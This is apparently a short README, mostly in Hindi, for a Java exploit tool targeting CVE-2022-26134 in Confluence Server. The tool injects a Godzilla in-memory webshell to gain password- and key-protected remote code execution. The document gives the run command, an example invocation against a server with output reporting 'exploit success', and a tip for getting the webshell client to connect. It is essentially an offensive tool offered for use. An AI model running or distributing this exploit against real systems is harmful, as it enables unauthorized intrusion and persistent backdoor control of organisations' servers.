
CVE-2022-26134 के लिए Java-आधारित एक्सप्लॉइट जो Confluence सर्वर में Godzilla वेबशेल इंजेक्ट करता है, पासवर्ड और कुंजी प्रमाणीकरण के साथ रिमोट कोड निष्पादन सक्षम करता है।
java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥
उदाहरण
java -jar CVE-2022-26134.jar pass key
यदि मेमोरी शेल सफलतापूर्वक इंजेक्ट किया गया है लेकिन गॉडज़िला कनेक्ट नहीं कर सकता, तो कृपया अनुरोध कॉन्फ़िगरेशन में निम्नलिखित प्रोटोकॉल हेडर जोड़ें या गॉडज़िला के लिए Burp प्रॉक्सी कॉन्फ़िगर करें।
Connection: close

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key
C:\CVE_2022_26134_jar>
